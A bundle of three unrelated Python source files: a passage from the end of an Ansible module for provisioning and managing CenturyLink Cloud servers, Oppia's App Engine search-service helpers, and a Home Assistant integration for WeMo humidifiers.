'custom_fields': p.get('custom_fields'),
'ttl': p.get('ttl'),
'managed_os': p.get('managed_os'),
'description': p.get('description'),
'source_server_password': p.get('source_server_password'),
'cpu_autoscale_policy_id': p.get('cpu_autoscale_policy_id'),
'anti_affinity_policy_id': p.get('anti_affinity_policy_id'),
'packages': p.get('packages'),
'configuration_id': p.get('configuration_id'),
'os_type': p.get('os_type')
}
count = override_count if override_count else p.get('count')
changed = False if count == 0 else True
if not changed:
return server_dict_array, created_server_ids, partial_created_servers_ids, changed
for i in range(0, count):
if not module.check_mode:
req = self._create_clc_server(clc=clc,
module=module,
server_params=params)
server = req.requests[0].Server()
request_list.append(req)
servers.append(server)
self._wait_for_requests(module, request_list)
self._refresh_servers(module, servers)
ip_failed_servers = self._add_public_ip_to_servers(
module=module,
should_add_public_ip=add_public_ip,
servers=servers,
public_ip_protocol=public_ip_protocol,
public_ip_ports=public_ip_ports)
ap_failed_servers = self._add_alert_policy_to_servers(clc=clc,
module=module,
servers=servers)
for server in servers:
if server in ip_failed_servers or server in ap_failed_servers:
partial_created_servers_ids.append(server.id)
else:
# reload server details
server = clc.v2.Server(server.id)
server.data['ipaddress'] = server.details[
'ipAddresses'][0]['internal']
if add_public_ip and len(server.PublicIPs().public_ips) > 0:
server.data['publicip'] = str(
server.PublicIPs().public_ips[0])
created_server_ids.append(server.id)
server_dict_array.append(server.data)
return server_dict_array, created_server_ids, partial_created_servers_ids, changed
def _enforce_count(self, module, clc):
"""
Enforce that there is the right number of servers in the provided group.
Starts or stops servers as necessary.
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:return: a list of dictionaries with server information about the servers that were created or deleted
"""
p = module.params
changed = False
count_group = p.get('count_group')
datacenter = ClcServer._find_datacenter(clc, module)
exact_count = p.get('exact_count')
server_dict_array = []
partial_servers_ids = []
changed_server_ids = []
# fail here if the exact count was specified without filtering
# on a group, as this may lead to a undesired removal of instances
if exact_count and count_group is None:
return module.fail_json(
msg="you must use the 'count_group' option with exact_count")
servers, running_servers = ClcServer._find_running_servers_by_group(
module, datacenter, count_group)
if len(running_servers) == exact_count:
changed = False
elif len(running_servers) < exact_count:
to_create = exact_count - len(running_servers)
server_dict_array, changed_server_ids, partial_servers_ids, changed \
= self._create_servers(module, clc, override_count=to_create)
for server in server_dict_array:
running_servers.append(server)
elif len(running_servers) > exact_count:
to_remove = len(running_servers) - exact_count
all_server_ids = sorted([x.id for x in running_servers])
remove_ids = all_server_ids[0:to_remove]
(changed, server_dict_array, changed_server_ids) \
= ClcServer._delete_servers(module, clc, remove_ids)
return server_dict_array, changed_server_ids, partial_servers_ids, changed
@staticmethod
def _wait_for_requests(module, request_list):
"""
Block until server provisioning requests are completed.
:param module: the AnsibleModule object
:param request_list: a list of clc-sdk.Request instances
:return: none
"""
wait = module.params.get('wait')
if wait:
# Requests.WaitUntilComplete() returns the count of failed requests
failed_requests_count = sum(
[request.WaitUntilComplete() for request in request_list])
if failed_requests_count > 0:
module.fail_json(
msg='Unable to process server request')
@staticmethod
def _refresh_servers(module, servers):
"""
Loop through a list of servers and refresh them.
:param module: the AnsibleModule object
:param servers: list of clc-sdk.Server instances to refresh
:return: none
"""
for server in servers:
try:
server.Refresh()
except CLCException as ex:
module.fail_json(msg='Unable to refresh the server {0}. {1}'.format(
server.id, ex.message
))
@staticmethod
def _add_public_ip_to_servers(
module,
should_add_public_ip,
servers,
public_ip_protocol,
public_ip_ports):
"""
Create a public IP for servers
:param module: the AnsibleModule object
:param should_add_public_ip: boolean - whether or not to provision a public ip for servers. Skipped if False
:param servers: List of servers to add public ips to
:param public_ip_protocol: a protocol to allow for the public ips
:param public_ip_ports: list of ports to allow for the public ips
:return: none
"""
failed_servers = []
if not should_add_public_ip:
return failed_servers
ports_lst = []
request_list = []
server = None
for port in public_ip_ports:
ports_lst.append(
{'protocol': public_ip_protocol, 'port': port})
try:
if not module.check_mode:
for server in servers:
request = server.PublicIPs().Add(ports_lst)
request_list.append(request)
except APIFailedResponse:
failed_servers.append(server)
ClcServer._wait_for_requests(module, request_list)
return failed_servers
@staticmethod
def _add_alert_policy_to_servers(clc, module, servers):
"""
Associate the alert policy to servers
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param servers: List of servers to add alert policy to
:return: failed_servers: the list of servers which failed while associating alert policy
"""
failed_servers = []
p = module.params
alert_policy_id = p.get('alert_policy_id')
alias = p.get('alias')
if alert_policy_id and not module.check_mode:
for server in servers:
try:
ClcServer._add_alert_policy_to_server(
clc=clc,
alias=alias,
server_id=server.id,
alert_policy_id=alert_policy_id)
except CLCException:
failed_servers.append(server)
return failed_servers
@staticmethod
def _add_alert_policy_to_server(
clc, alias, server_id, alert_policy_id):
"""
Associate an alert policy to a clc server
:param clc: the clc-sdk instance to use
:param alias: the clc account alias
:param server_id: The clc server id
:param alert_policy_id: the alert policy id to be associated to the server
:return: none
"""
try:
clc.v2.API.Call(
method='POST',
url='servers/%s/%s/alertPolicies' % (alias, server_id),
payload=json.dumps(
{
'id': alert_policy_id
}))
except APIFailedResponse as e:
raise CLCException(
'Failed to associate alert policy to the server : {0} with Error {1}'.format(
server_id, str(e.response_text)))
@staticmethod
def _get_alert_policy_id_by_name(clc, module, alias, alert_policy_name):
"""
Returns the alert policy id for the given alert policy name
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the clc account alias
:param alert_policy_name: the name of the alert policy
:return: alert_policy_id: the alert policy id
"""
alert_policy_id = None
policies = clc.v2.API.Call('GET', '/v2/alertPolicies/%s' % alias)
if not policies:
return alert_policy_id
for policy in policies.get('items'):
if policy.get('name') == alert_policy_name:
if not alert_policy_id:
alert_policy_id = policy.get('id')
else:
return module.fail_json(
msg='multiple alert policies were found with policy name : %s' % alert_policy_name)
return alert_policy_id
@staticmethod
def _delete_servers(module, clc, server_ids):
"""
Delete the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to delete
:return: a list of dictionaries with server information about the servers that were deleted
"""
terminated_server_ids = []
server_dict_array = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if not module.check_mode:
request_list.append(server.Delete())
ClcServer._wait_for_requests(module, request_list)
for server in servers:
terminated_server_ids.append(server.id)
return True, server_dict_array, terminated_server_ids
@staticmethod
def _start_stop_servers(module, clc, server_ids):
"""
Start or Stop the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to start or stop
:return: a list of dictionaries with server information about the servers that were started or stopped
"""
p = module.params
state = p.get('state')
changed = False
changed_servers = []
server_dict_array = []
result_server_ids = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if server.powerState != state:
changed_servers.append(server)
if not module.check_mode:
request_list.append(
ClcServer._change_server_power_state(
module,
server,
state))
changed = True
ClcServer._wait_for_requests(module, request_list)
ClcServer._refresh_servers(module, changed_servers)
for server in set(changed_servers + servers):
try:
server.data['ipaddress'] = server.details[
'ipAddresses'][0]['internal']
server.data['publicip'] = str(
server.PublicIPs().public_ips[0])
except (KeyError, IndexError):
pass
server_dict_array.append(server.data)
result_server_ids.append(server.id)
return changed, server_dict_array, result_server_ids
@staticmethod
def _change_server_power_state(module, server, state):
"""
Change the server powerState
:param module: the module to check for intended state
:param server: the server to start or stop
:param state: the intended powerState for the server
:return: the request object from clc-sdk call
"""
result = None
try:
if state == 'started':
result = server.PowerOn()
else:
# Try to shut down the server and fall back to power off when unable to shut down.
result = server.ShutDown()
if result and hasattr(result, 'requests') and result.requests[0]:
return result
else:
result = server.PowerOff()
except CLCException:
module.fail_json(
msg='Unable to change power state for server {0}'.format(
server.id))
return result
@staticmethod
def _find_running_servers_by_group(module, datacenter, count_group):
"""
Find a list of running servers in the provided group
:param module: the AnsibleModule object
:param datacenter: the clc-sdk.Datacenter instance to use to lookup the group
:param count_group: the group to count the servers
:return: list of servers, and list of running servers
"""
group = ClcServer._find_group(
module=module,
datacenter=datacenter,
lookup_group=count_group)
servers = group.Servers().Servers()
running_servers = []
for server in servers:
if server.status == 'active' and server.powerState == 'started':
running_servers.append(server)
return servers, running_servers
@staticmethod
def _find_group(module, datacenter, lookup_group=None):
"""
Find a server group in a datacenter by calling the CLC API
:param module: the AnsibleModule instance
:param datacenter: clc-sdk.Datacenter instance to search for the group
:param lookup_group: string name of the group to search for
:return: clc-sdk.Group instance
"""
if not lookup_group:
lookup_group = module.params.get('group')
try:
return datacenter.Groups().Get(lookup_group)
except CLCException:
pass
# The search above only acts on the main
result = ClcServer._find_group_recursive(
module,
datacenter.Groups(),
lookup_group)
if result is None:
module.fail_json(
msg=str(
"Unable to find group: " +
lookup_group +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_group_recursive(module, group_list, lookup_group):
"""
Find a server group by recursively walking the tree
:param module: the AnsibleModule instance to use
:param group_list: a list of groups to search
:param lookup_group: the group to look for
:return: list of groups
"""
result = None
for group in group_list.groups:
subgroups = group.Subgroups()
try:
return subgroups.Get(lookup_group)
except CLCException:
result = ClcServer._find_group_recursive(
module,
subgroups,
lookup_group)
if result is not None:
break
return result
@staticmethod
def _create_clc_server(
clc,
module,
server_params):
"""
Call the CLC Rest API to Create a Server
:param clc: the clc-python-sdk instance to use
:param module: the AnsibleModule instance to use
:param server_params: a dictionary of params to use to create the servers
:return: clc-sdk.Request object linked to the queued server request
"""
try:
res = clc.v2.API.Call(
method='POST',
url='servers/%s' %
(server_params.get('alias')),
payload=json.dumps(
{
'name': server_params.get('name'),
'description': server_params.get('description'),
'groupId': server_params.get('group_id'),
'sourceServerId': server_params.get('template'),
'isManagedOS': server_params.get('managed_os'),
'primaryDNS': server_params.get('primary_dns'),
'secondaryDNS': server_params.get('secondary_dns'),
'networkId': server_params.get('network_id'),
'ipAddress': server_params.get('ip_address'),
'password': server_params.get('password'),
'sourceServerPassword': server_params.get('source_server_password'),
'cpu': server_params.get('cpu'),
'cpuAutoscalePolicyId': server_params.get('cpu_autoscale_policy_id'),
'memoryGB': server_params.get('memory'),
'type': server_params.get('type'),
'storageType': server_params.get('storage_type'),
'antiAffinityPolicyId': server_params.get('anti_affinity_policy_id'),
'customFields': server_params.get('custom_fields'),
'additionalDisks': server_params.get('additional_disks'),
'ttl': server_params.get('ttl'),
'packages': server_params.get('packages'),
'configurationId': server_params.get('configuration_id'),
'osType': server_params.get('os_type')}))
result = clc.v2.Requests(res)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to create the server: {0}. {1}'.format(
server_params.get('name'),
ex.response_text
))
#
# Patch the Request object so that it returns a valid server
# Find the server's UUID from the API response
server_uuid = [obj['id']
for obj in res['links'] if obj['rel'] == 'self'][0]
# Change the request server method to a _find_server_by_uuid closure so
# that it will work
result.requests[0].Server = lambda: ClcServer._find_server_by_uuid_w_retry(
clc,
module,
server_uuid,
server_params.get('alias'))
return result
@staticmethod
def _get_anti_affinity_policy_id(clc, module, alias, aa_policy_name):
"""
retrieves the anti affinity policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param aa_policy_name: the anti affinity policy name
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
aa_policies = clc.v2.API.Call(method='GET',
url='antiAffinityPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to fetch anti affinity policies for account: {0}. {1}'.format(
alias, ex.response_text))
for aa_policy in aa_policies.get('items'):
if aa_policy.get('name') == aa_policy_name:
if not aa_policy_id:
aa_policy_id = aa_policy.get('id')
else:
return module.fail_json(
msg='multiple anti affinity policies were found with policy name : %s' % aa_policy_name)
return aa_policy_id
#
# This is the function that gets patched to the Request.server object using a lamda closure
#
@staticmethod
def _find_server_by_uuid_w_retry(
clc, module, svr_uuid, alias=None, retries=5, back_out=2):
"""
Find the clc server by the UUID returned from the provisioning request. Retry the request if a 404 is returned.
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param svr_uuid: UUID of the server
:param retries: the number of retry attempts to make prior to fail. default is 5
:param alias: the Account Alias to search
:return: a clc-sdk.Server instance
"""
if not alias:
alias = clc.v2.Account.GetAlias()
# Wait and retry if the api returns a 404
while True:
retries -= 1
try:
server_obj = clc.v2.API.Call(
method='GET', url='servers/%s/%s?uuid=true' %
(alias, svr_uuid))
server_id = server_obj['id']
server = clc.v2.Server(
id=server_id,
alias=alias,
server_obj=server_obj)
return server
except APIFailedResponse as e:
if e.response_status_code != 404:
return module.fail_json(
msg='A failure response was received from CLC API when '
'attempting to get details for a server: UUID=%s, Code=%i, Message=%s' %
(svr_uuid, e.response_status_code, e.message))
if retries == 0:
return module.fail_json(
msg='Unable to reach the CLC API after 5 attempts')
time.sleep(back_out)
back_out *= 2
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
The main function. Instantiates the module and calls process_request.
:return: none
"""
argument_dict = ClcServer._define_module_argument_spec()
module = AnsibleModule(supports_check_mode=True, **argument_dict)
clc_server = ClcServer(module)
clc_server.process_request()
if __name__ == '__main__':
main()
| |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS-IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides search services."""
__author__ = 'Frederik Creemers'
import datetime
import logging
import numbers
import feconf
from google.appengine.api import search as gae_search
DEFAULT_NUM_RETRIES = 3
class SearchFailureError(Exception):
"""This error is raised when a search operation fails.
The original_exception will point to what went wrong inside the gae sdk.
Other platform implementations should have a similar way of revealing
platform specific errors."""
def __init__(self, original_exception=None):
super(SearchFailureError, self).__init__(
'%s: %s' % (type(original_exception), original_exception.message))
self.original_exception = original_exception
def add_documents_to_index(documents, index, retries=DEFAULT_NUM_RETRIES):
"""Adds a document to an index.
Args:
- documents: a list of documents. Each document should be a dictionary.
Every key in the document is a field name, and the corresponding
value will be the field's value.
If there is a key named 'id', its value will be used as the
document's id.
If there is a key named 'rank', its value will be used as
the document's rank.
By default, search results are returned ordered by descending rank.
If there is a key named 'language_code', its value will be used as
the document's language. Otherwise, feconf.DEFAULT_LANGUAGE_CODE is
used.
- index: the name of the index to insert the document into, a string.
- retries: the number of times to retry inserting the documents.
Returns:
returns a list of document ids of the documents that were added.
Raises:
- SearchFailureError: raised when the indexing fails. If it fails for any
document, none will be inserted.
- ValueError: raised when invalid values are given.
"""
if not isinstance(index, basestring):
raise ValueError(
'Index must be the unicode/str name of an index, got %s'
% type(index))
index = gae_search.Index(index)
gae_docs = [_dict_to_search_document(d) for d in documents]
try:
logging.debug('adding the following docs to index %s: %s',
index.name, documents)
results = index.put(gae_docs, deadline=5)
except gae_search.PutError as e:
logging.exception('PutError raised.')
if retries > 1:
for res in e.results:
if res.code == gae_search.OperationResult.TRANSIENT_ERROR:
new_retries = retries - 1
logging.debug('%d tries left, retrying.' % (new_retries))
return add_documents_to_index(
documents=documents,
index=index.name,
retries=new_retries)
# At this pint, either we don't have any tries left, or none of the
# results has a transient error code.
raise SearchFailureError(e)
return [r.id for r in results]
def _dict_to_search_document(d):
if not isinstance(d, dict):
raise ValueError('document should be a dictionary, got %s' % type(d))
doc_id = d.get('id')
rank = d.get('rank')
language_code = d.get('language_code')
fields = []
for key, value in d.iteritems():
if key not in ['id', 'rank']:
fields += _make_fields(key, value)
doc = gae_search.Document(
doc_id=doc_id, fields=fields, rank=rank, language=language_code)
return doc
def _make_fields(key, value):
if isinstance(value, list):
_validate_list(key, value)
return [_make_fields(key, v)[0] for v in value]
if isinstance(value, basestring):
return [gae_search.TextField(name=key, value=value)]
if isinstance(value, numbers.Number):
return [gae_search.NumberField(name=key, value=value)]
if isinstance(value, datetime.datetime) or isinstance(
value, datetime.date):
return [gae_search.DateField(name=key, value=value)]
raise ValueError(
'Value for document field %s should be a (unicode) string, numeric '
'type, datetime.date, datetime.datetime or list of such types, got %s'
% (key, type(value)))
def _validate_list(key, value):
"""Validates a list to be included as document fields. The key is just
passed in to make better error messages."""
for i in xrange(len(value)):
element = value[i]
if not (isinstance(element, basestring) or
isinstance(element, datetime.date) or
isinstance(element, datetime.datetime) or
isinstance(element, numbers.Number)):
raise ValueError(
'All values of a multi-valued field must be numbers, strings, '
'date or datetime instances, The %dth value for field %s has'
' type %s.' % (i, key, type(element)))
def delete_documents_from_index(
doc_ids, index, retries=DEFAULT_NUM_RETRIES):
"""Deletes documents from an index.
Args:
- doc_ids: a list of document ids of documents to be deleted from the
index.
- index: the name of the index to delete the document from, a string.
- retries: the number of times to retry deleting the documents.
Raises:
- SearchFailureError: raised when the deletion fails. If it fails for any
document, none will be deleted.
"""
if not isinstance(index, basestring):
raise ValueError(
'Index must be the unicode/str name of an index, got %s'
% type(index))
for i in xrange(len(doc_ids)):
if not isinstance(doc_ids[i], basestring):
raise ValueError('all doc_ids must be string, got %s at index %d' %
(type(doc_ids[i]), i))
index = gae_search.Index(index)
try:
logging.debug('Attempting to delete documents from index %s, ids: %s' %
(index.name, ', '.join(doc_ids)))
index.delete(doc_ids, deadline=5)
except gae_search.DeleteError as e:
logging.exception('Something went wrong during deletion.')
if retries > 1:
for res in e.results:
if res.code == gae_search.OperationResult.TRANSIENT_ERROR:
new_retries = retries - 1
logging.debug('%d tries left, retrying.' % (new_retries))
delete_documents_from_index(
doc_ids=doc_ids,
index=index.name,
retries=new_retries)
return
raise SearchFailureError(e)
def clear_index(index_name):
"""Clears an index completely.
WARNING: This does all the clearing in-request, and may therefore fail if
there are too many entries in the index.
Args:
- index: the name of the index to delete the document from, a string.
"""
index = gae_search.Index(index_name)
while True:
doc_ids = [
document.doc_id for document in index.get_range(ids_only=True)]
if not doc_ids:
break
index.delete(doc_ids)
def search(query_string, index, cursor=None, limit=feconf.GALLERY_PAGE_SIZE,
sort='', ids_only=False, retries=DEFAULT_NUM_RETRIES):
"""Searches for documents in an index.
Args:
- query_string: the search query.
The syntax used is described here:
https://developers.google.com/appengine/docs/python/search/query_strings
- index: the name of the index to search.
- cursor: a cursor string, as returned by this function. Pass this in to
get the next 'page' of results. Leave as None to start at the
beginning.
- sort: a string indicating how to sort results. This should be a string
of space separated values. Each value should start with a '+' or a
'-' character indicating whether to sort in ascending or descending
order respectively. This character should be followed by a field name
to sort on.
- limit: the maximum number of documents to return.
- ids_only: whether to only return document ids.
- retries: the number of times to retry searching the index.
Returns:
returns a tuple with two elements:
- a list of dictionaries representing search documents. If ids_only is
True, this will be a list of strings, doc_ids.
- a cursor that you can pass back in to get the next page of results.
This wil be a web safe string that you can use in urls.
It will be None if there is no next page.
"""
sort_options = None
if cursor is None:
gae_cursor = gae_search.Cursor()
else:
gae_cursor = gae_search.Cursor(web_safe_string=cursor)
if sort:
expr = _string_to_sort_expressions(sort)
sort_options = gae_search.SortOptions(expr)
options = gae_search.QueryOptions(
limit=limit,
cursor=gae_cursor,
ids_only=ids_only,
sort_options=sort_options)
try:
query = gae_search.Query(query_string, options=options)
except gae_search.QueryError as e:
# This can happen for query strings like "NOT" or a string that
# contains backslashes.
logging.exception('Could not parse query string %s' % query_string)
return [], None
index = gae_search.Index(index)
try:
logging.debug('attempting a search with query %s' % query)
results = index.search(query)
except gae_search.TransientError as e:
logging.exception('something went wrong while searching.')
if retries > 1:
logging.debug('%d attempts left, retrying...' % (retries - 1))
return search(
query_string,
index.name,
cursor=cursor,
limit=limit,
sort=sort,
ids_only=ids_only,
retries=retries - 1)
else:
raise SearchFailureError(e)
result_cursor_str = None
if results.cursor:
result_cursor_str = results.cursor.web_safe_string
if ids_only:
result_docs = [doc.doc_id for doc in results.results]
else:
result_docs = [
_search_document_to_dict(doc) for doc in results.results]
return result_docs, result_cursor_str
def _string_to_sort_expressions(s):
sort_expressions = []
s_tokens = s.split()
for expression in s_tokens:
if expression.startswith('+'):
direction = gae_search.SortExpression.ASCENDING
elif expression.startswith('-'):
direction = gae_search.SortExpression.DESCENDING
else:
raise ValueError(
'Fields in the sort expression must start with "+"'
' or "-" to indicate sort direction.'
' The field %s has no such indicator'
' in expression "%s".' % (expression, s))
sort_expressions.append(gae_search.SortExpression(expression[1:],
direction))
return sort_expressions
def get_document_from_index(doc_id, index):
"""Returns a document with a give doc_id(s) from the index.
args:
- doc_id: a doc_id as a string
- index: the name of an index, a string.
returns
- the requested document as a dict
"""
index = gae_search.Index(index)
return _search_document_to_dict(index.get(doc_id))
def _search_document_to_dict(doc):
d = {'id': doc.doc_id, 'language_code': doc.language, 'rank': doc.rank}
for field in doc.fields:
d[field.name] = field.value
return d
| |
"""Support for WeMo humidifier."""
import asyncio
import logging
from datetime import timedelta
import requests
import async_timeout
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.fan import (
DOMAIN,
SUPPORT_SET_SPEED,
FanEntity,
SPEED_OFF,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_HIGH,
)
from homeassistant.exceptions import PlatformNotReady
from homeassistant.const import ATTR_ENTITY_ID
from . import SUBSCRIPTION_REGISTRY
SCAN_INTERVAL = timedelta(seconds=10)
DATA_KEY = "fan.wemo"
_LOGGER = logging.getLogger(__name__)
ATTR_CURRENT_HUMIDITY = "current_humidity"
ATTR_TARGET_HUMIDITY = "target_humidity"
ATTR_FAN_MODE = "fan_mode"
ATTR_FILTER_LIFE = "filter_life"
ATTR_FILTER_EXPIRED = "filter_expired"
ATTR_WATER_LEVEL = "water_level"
# The WEMO_ constants below come from pywemo itself
WEMO_ON = 1
WEMO_OFF = 0
WEMO_HUMIDITY_45 = 0
WEMO_HUMIDITY_50 = 1
WEMO_HUMIDITY_55 = 2
WEMO_HUMIDITY_60 = 3
WEMO_HUMIDITY_100 = 4
WEMO_FAN_OFF = 0
WEMO_FAN_MINIMUM = 1
WEMO_FAN_LOW = 2 # Not used due to limitations of the base fan implementation
WEMO_FAN_MEDIUM = 3
WEMO_FAN_HIGH = 4 # Not used due to limitations of the base fan implementation
WEMO_FAN_MAXIMUM = 5
WEMO_WATER_EMPTY = 0
WEMO_WATER_LOW = 1
WEMO_WATER_GOOD = 2
SUPPORTED_SPEEDS = [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
SUPPORTED_FEATURES = SUPPORT_SET_SPEED
# Since the base fan object supports a set list of fan speeds,
# we have to reuse some of them when mapping to the 5 WeMo speeds
WEMO_FAN_SPEED_TO_HASS = {
WEMO_FAN_OFF: SPEED_OFF,
WEMO_FAN_MINIMUM: SPEED_LOW,
WEMO_FAN_LOW: SPEED_LOW, # Reusing SPEED_LOW
WEMO_FAN_MEDIUM: SPEED_MEDIUM,
WEMO_FAN_HIGH: SPEED_HIGH, # Reusing SPEED_HIGH
WEMO_FAN_MAXIMUM: SPEED_HIGH,
}
# Because we reused mappings in the previous dict, we have to filter them
# back out in this dict, or else we would have duplicate keys
HASS_FAN_SPEED_TO_WEMO = {
v: k
for (k, v) in WEMO_FAN_SPEED_TO_HASS.items()
if k not in [WEMO_FAN_LOW, WEMO_FAN_HIGH]
}
SERVICE_SET_HUMIDITY = "wemo_set_humidity"
SET_HUMIDITY_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_TARGET_HUMIDITY): vol.All(
vol.Coerce(float), vol.Range(min=0, max=100)
),
}
)
SERVICE_RESET_FILTER_LIFE = "wemo_reset_filter_life"
RESET_FILTER_LIFE_SCHEMA = vol.Schema({vol.Required(ATTR_ENTITY_ID): cv.entity_ids})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up discovered WeMo humidifiers."""
from pywemo import discovery
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
if discovery_info is None:
return
location = discovery_info["ssdp_description"]
mac = discovery_info["mac_address"]
try:
device = WemoHumidifier(discovery.device_from_description(location, mac))
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:
_LOGGER.error("Unable to access %s (%s)", location, err)
raise PlatformNotReady
hass.data[DATA_KEY][device.entity_id] = device
add_entities([device])
def service_handle(service):
"""Handle the WeMo humidifier services."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
humidifiers = [
device
for device in hass.data[DATA_KEY].values()
if device.entity_id in entity_ids
]
if service.service == SERVICE_SET_HUMIDITY:
target_humidity = service.data.get(ATTR_TARGET_HUMIDITY)
for humidifier in humidifiers:
humidifier.set_humidity(target_humidity)
elif service.service == SERVICE_RESET_FILTER_LIFE:
for humidifier in humidifiers:
humidifier.reset_filter_life()
# Register service(s)
hass.services.register(
DOMAIN, SERVICE_SET_HUMIDITY, service_handle, schema=SET_HUMIDITY_SCHEMA
)
hass.services.register(
DOMAIN,
SERVICE_RESET_FILTER_LIFE,
service_handle,
schema=RESET_FILTER_LIFE_SCHEMA,
)
class WemoHumidifier(FanEntity):
"""Representation of a WeMo humidifier."""
def __init__(self, device):
"""Initialize the WeMo switch."""
self.wemo = device
self._state = None
self._available = True
self._update_lock = None
self._fan_mode = None
self._target_humidity = None
self._current_humidity = None
self._water_level = None
self._filter_life = None
self._filter_expired = None
self._last_fan_on_mode = WEMO_FAN_MEDIUM
self._model_name = self.wemo.model_name
self._name = self.wemo.name
self._serialnumber = self.wemo.serialnumber
def _subscription_callback(self, _device, _type, _params):
"""Update the state by the Wemo device."""
_LOGGER.info("Subscription update for %s", self.name)
updated = self.wemo.subscription_update(_type, _params)
self.hass.add_job(self._async_locked_subscription_callback(not updated))
async def _async_locked_subscription_callback(self, force_update):
"""Handle an update from a subscription."""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
await self._async_locked_update(force_update)
self.async_schedule_update_ha_state()
@property
def unique_id(self):
"""Return the ID of this WeMo humidifier."""
return self._serialnumber
@property
def name(self):
"""Return the name of the humidifier if any."""
return self._name
@property
def is_on(self):
"""Return true if switch is on. Standby is on."""
return self._state
@property
def available(self):
"""Return true if switch is available."""
return self._available
@property
def icon(self):
"""Return the icon of device based on its type."""
return "mdi:water-percent"
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_CURRENT_HUMIDITY: self._current_humidity,
ATTR_TARGET_HUMIDITY: self._target_humidity,
ATTR_FAN_MODE: self._fan_mode,
ATTR_WATER_LEVEL: self._water_level,
ATTR_FILTER_LIFE: self._filter_life,
ATTR_FILTER_EXPIRED: self._filter_expired,
}
@property
def speed(self) -> str:
"""Return the current speed."""
return WEMO_FAN_SPEED_TO_HASS.get(self._fan_mode)
@property
def speed_list(self) -> list:
"""Get the list of available speeds."""
return SUPPORTED_SPEEDS
@property
def supported_features(self) -> int:
"""Flag supported features."""
return SUPPORTED_FEATURES
async def async_added_to_hass(self):
"""Wemo humidifier added to HASS."""
# Define inside async context so we know our event loop
self._update_lock = asyncio.Lock()
registry = SUBSCRIPTION_REGISTRY
await self.hass.async_add_executor_job(registry.register, self.wemo)
registry.on(self.wemo, None, self._subscription_callback)
async def async_update(self):
"""Update WeMo state.
Wemo has an aggressive retry logic that sometimes can take over a
minute to return. If we don't get a state after 5 seconds, assume the
Wemo humidifier is unreachable. If update goes through, it will be made
available again.
"""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
try:
with async_timeout.timeout(5):
await asyncio.shield(self._async_locked_update(True))
except asyncio.TimeoutError:
_LOGGER.warning("Lost connection to %s", self.name)
self._available = False
async def _async_locked_update(self, force_update):
"""Try updating within an async lock."""
async with self._update_lock:
await self.hass.async_add_executor_job(self._update, force_update)
def _update(self, force_update=True):
"""Update the device state."""
try:
self._state = self.wemo.get_state(force_update)
self._fan_mode = self.wemo.fan_mode_string
self._target_humidity = self.wemo.desired_humidity_percent
self._current_humidity = self.wemo.current_humidity_percent
self._water_level = self.wemo.water_level_string
self._filter_life = self.wemo.filter_life_percent
self._filter_expired = self.wemo.filter_expired
if self.wemo.fan_mode != WEMO_FAN_OFF:
self._last_fan_on_mode = self.wemo.fan_mode
if not self._available:
_LOGGER.info("Reconnected to %s", self.name)
self._available = True
except AttributeError as err:
_LOGGER.warning("Could not update status for %s (%s)", self.name, err)
self._available = False
def turn_on(self, speed: str = None, **kwargs) -> None:
"""Turn the switch on."""
if speed is None:
self.wemo.set_state(self._last_fan_on_mode)
else:
self.set_speed(speed)
def turn_off(self, **kwargs) -> None:
"""Turn the switch off."""
self.wemo.set_state(WEMO_FAN_OFF)
def set_speed(self, speed: str) -> None:
"""Set the fan_mode of the Humidifier."""
self.wemo.set_state(HASS_FAN_SPEED_TO_WEMO.get(speed))
def set_humidity(self, humidity: float) -> None:
"""Set the target humidity level for the Humidifier."""
if humidity < 50:
self.wemo.set_humidity(WEMO_HUMIDITY_45)
elif 50 <= humidity < 55:
self.wemo.set_humidity(WEMO_HUMIDITY_50)
elif 55 <= humidity < 60:
self.wemo.set_humidity(WEMO_HUMIDITY_55)
elif 60 <= humidity < 100:
self.wemo.set_humidity(WEMO_HUMIDITY_60)
elif humidity >= 100:
self.wemo.set_humidity(WEMO_HUMIDITY_100)
def reset_filter_life(self) -> None:
"""Reset the filter life to 100%."""
self.wemo.reset_filter_life()
| |
